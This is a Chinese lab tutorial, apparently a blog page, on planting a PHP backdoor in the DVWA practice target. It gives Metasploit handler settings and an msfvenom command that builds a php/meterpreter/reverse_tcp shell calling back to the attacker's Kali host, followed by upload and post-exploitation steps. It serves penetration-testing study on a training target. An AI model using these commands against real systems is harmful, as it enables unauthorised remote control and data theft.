PHP后门反弹连接DVWA

  • 环境准备
    • 操作系统准备
    • DVWA靶场准备
  • metasploit配置监控及攻击载荷
    • 配置监控
    • 配置攻击载荷
    • 生成php后门
    • 上传后门文件
    • 后渗透获取数据库信息

环境准备

操作系统准备

kali : 192.168.202.133

win10:192.168.202.139

DVWA靶场准备

DVWA下载

注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境


设置网站

配置数据库密码
与数据库设置保持一致

metasploit配置监控及攻击载荷

配置监控

使用handler模块

use exploit/multi/handler

配置攻击载荷

第一步设置payload
set payload php/meterpreter/reverse_tcp

第二步设置 lhost 和 lport
set lhost xxxip ;
set lport xxx端口;

生成php后门

执行攻击获得meterpreter
新建一个终端在终端内输入

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.202.133 lport=4664 R>shell.php

上传后门文件

使用Python简单的web服务,把后门文件下载到WIN10

访问该木马文件

后渗透获取数据库信息

PHP后门反弹连接DVWA相关推荐

  1. 木马病毒隐身穿墙术解密之文件注入和反弹连接

    作者: 刘源 比特网 2010-04-01 12:05:08 木马病毒隐身穿墙术解密之文件注入和反弹连接 对于木马病毒当前所使用的隐身和穿墙术,到这篇已经是第三篇了,虽然每篇的篇幅都不是很长,但每篇都 ...

  2. metasploit完整的使用流程包括meterpreter后渗透

    metasploit完整的使用流程包括meterpreter后渗透 主机发现 基于ARP发现内网存活主机 基于FTP服务 基于HTTP服务 基于SMB 漏洞扫描 漏洞渗透利用 利用ms17_010 利 ...

  3. 【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。...

    反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹. 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常 ...

  4. 2018-2019-2 20165315 《网络对抗技术》Exp2+ 后门进阶

    2018-2019-2 20165315 <网络对抗技术>Exp2+ 后门进阶 一.实验要求 以下三个课题三选一 1.其他专用后门工具研究(CROSSRAT ...) 2.恶意代码绑定技术 ...

  5. #20155235 《网络攻防》 实验二 后门原理与实践

    20155235 <网络攻防> 实验二 后门原理与实践 实验目的 建立一个后门连接是如此的简单,功能又如此强大.通过亲手实践并了解这一事实,从而提高自己的安全意识 . 实验内容 (1)使用 ...

  6. 2018-2019-2 《网络对抗技术》Exp2 后门原理与应用 20165211

    目录 后门原理与应用 实验内容 基础问题回答 常用后门工具 Netcat Socat MSFmeterpreter 实践过程记录 1.后门工具熟悉 2.使用netcat获取主机操作Shell,cron ...

  7. Exp2 后门原理与实践 20164323段钊阳

    220164323 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,. (2)例举你知道的后门如何 ...

  8. 2018-2019 Exp2 后门原理与实践

    2018-2019 Exp2 后门原理与实践 目录 一.实验内容说明及基础问题回答 二.工具准备 查看WindowsIP和LinuxIP Windows获得Linuxshell Linux 获得Win ...

  9. 2018-2019-2 网络对抗技术 20165328 Exp2 后门原理与实践

    实验内容: 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执 ...

最新文章

  1. JS 实现下载Blod文件
  2. tensorflow GPU 内存不够
  3. css选择器匹配没有属性x的元素[重复]
  4. 大脑构造图与功能解析_锻炼改变大脑
  5. 【量化投资】策略四(聚宽)
  6. 【CyberSecurityLearning 63】CSRF攻击
  7. 小度智能音箱维修点_智能音箱哪个好?小度 小爱 天猫 评测
  8. WebStorm Vue ElementUI
  9. linux查看端口所占用的进程号
  10. leetcode54:螺旋矩阵
  11. 工作109:路由菜单项
  12. Eigen 简明教程之如何从Python转到Eigen
  13. MongoDB在windows下安装和配置
  14. linux ip地址本地缓存,ip-address – 如何解析组织的IP地址(使用缓存)
  15. java 命令行运行 打包 IDEA
  16. html5通讯录模板,[应用模板]HTML5+Phonegap通讯录
  17. 如何使用smobiler的listview控件实现个人信息修改
  18. 关于物联网卡禁区和死卡问题的最全解释
  19. 基于 Verilog 的经典数字电路设计(3)选择器
  20. 加密邮箱的数字签名和加密原理

热门文章

  1. c++ primer plus 6.11第四题 加入Benevolent Order of Programmer后,
  2. 2023年重庆大学中国语言文学考研考情与难度、参考书及前辈经验
  3. 中国宠物用品品牌“Touchdog它它”完成数千万元Pre-A 轮融资
  4. SAS——编程——数学
  5. Kaptcha工具和手动实现验证码功能
  6. C语言字符串输入与输出函数
  7. 加油站涉税数据管理云平台
  8. 四旋翼动力学和仿真翻译(Quadcopter Dynamics and Simulation)
  9. 一名优秀的Web前端开发工程师的成长之路:如何学习前端开发知识以及书籍推荐
  10. 【腾讯开放平台】Android、IOS实现指定QQ临时会话功能